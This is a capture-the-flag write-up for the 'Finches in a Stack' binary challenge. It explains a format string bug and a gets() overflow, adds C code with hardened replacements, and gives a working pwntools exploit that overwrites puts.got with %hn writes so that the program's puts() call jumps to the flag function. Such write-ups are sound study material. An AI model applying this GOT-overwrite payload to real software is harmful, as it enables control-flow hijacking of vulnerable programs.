Finches in a Stack (Unintentional Way)

Description

This challenge wasn't supposed to be solved like this when I was discussing it with the author. To see the intended way, check out Finches in PIE. It is similar to this one, except that PIE is enabled.

Files

fias

flag.txt (you need this in the same directory as fias for the local exploit; fias will read the flag once you exploit it)

Enumeration

When you run the program, it asks you for two inputs, and it talks about a canary. I am guessing that you have to leak the canary with the first input and overwrite the return address with the second, then repair the overwritten canary with the leaked value.

Static Analysis

There is a handy function called flag that prints out the flag.

In say_hi(), we can see that first_input is passed to printf() as the format string, giving us a format string vulnerability.

The second input is read with gets(), so we can use it for a buffer overflow.
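To make the two bugs concrete, here is an added C example (not the challenge's source; function names and the buffer size are hypothetical) that places the vulnerable say_hi() pattern next to hardened equivalents: a greeting built with a literal format string, and a bounded line reader that replaces gets().

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge binary's source. Shows the two bugs the
   write-up finds in say_hi() (user input as printf's format string, gets())
   beside hardened equivalents. Names and sizes are assumptions. */

#define NAME_MAX_LEN 64

/* Vulnerable pattern: the caller's string *is* the format, so any %x / %n
   directives inside it are interpreted by printf. Kept for comparison only;
   never call this with untrusted data. */
void say_hi_vulnerable(const char *name)
{
    printf(name);
    putchar('\n');
}

/* Hardened: the format is a literal and the user string is only an argument,
   so '%' characters in it are printed, never interpreted. Writes at most n
   bytes to out and returns the length of the full greeting (snprintf rules). */
int greet_safe(const char *name, char *out, size_t n)
{
    return snprintf(out, n, "Hello, %s!", name);
}

/* gets() replacement: stores at most n-1 bytes in dst, strips the trailing
   newline, and discards the rest of an over-long line so it cannot spill into
   the next read. Returns the number of bytes stored, or -1 on EOF/error. */
int read_line_bounded(char *dst, size_t n, FILE *in)
{
    if (n == 0 || fgets(dst, (int)n, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[--len] = '\0';
    } else {
        /* no newline seen: the line was longer than the buffer, drain it */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)len;
}

int main(void)
{
    char name[NAME_MAX_LEN];
    char greeting[NAME_MAX_LEN + 16];

    if (read_line_bounded(name, sizeof name, stdin) < 0)
        return 1;
    greet_safe(name, greeting, sizeof greeting);
    puts(greeting);
    return 0;
}
```

Feeding `%x%x%n` to greet_safe() yields the literal text `Hello, %x%x%n!`, which is the whole point of the fix. Two build-time checks complement it: gcc's -Wformat-security flags the printf(name) form, and linking with Full RELRO (-Wl,-z,relro,-z,now) makes the GOT read-only after loading, so a write to puts.got like the one used below faults instead of redirecting control flow.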

Solution

Looking at this problem, you can just use the format string bug to write the address of flag into puts.got: after printf(&first_input) the program calls puts, and since we never return from say_hi() we don't need to touch the canary at all, the puts call simply lands in flag.

#!/usr/bin/python2.7
# Python 2: p32() returns a str, so it can be concatenated with the format directives below
from pwn import *

isLocal = True

if isLocal:
    p = process("./fias")
else:
    p = remote("95.216.233.106", 34995)

elf = ELF("./fias")

GOT_PUTS = elf.got['puts']   # 0x804c01c
FUNC_FLAG = elf.sym['flag']  # 0x080491d2
p.recvline()
p.recvline()
# Flag addr 0x080491d2
# First input is the format string. Layout of the payload:
#   - GOT_PUTS+2, 4 bytes of filler, GOT_PUTS (12 bytes of addresses on the stack)
#   - '%.8x' * 4 consumes the four stack slots before the buffer
#   - '%.2008x%hn': 12 + 32 + 2008 = 2052 = 0x0804 chars printed -> upper half of puts.got
#   - '%.35278x%hn': 2052 + 35278 = 37330 = 0x91d2 -> lower half of puts.got
# puts.got now holds 0x080491d2, so the puts() call after printf runs flag()
p.sendline(p32(GOT_PUTS+2) + '@@@@' + p32(GOT_PUTS) + '%.8x' * 4 + '%.2008x%hn' + '%.35278x%hn')

p.recvline()

p.recvline()
p.recvline()
print(p.recvline())  # flag
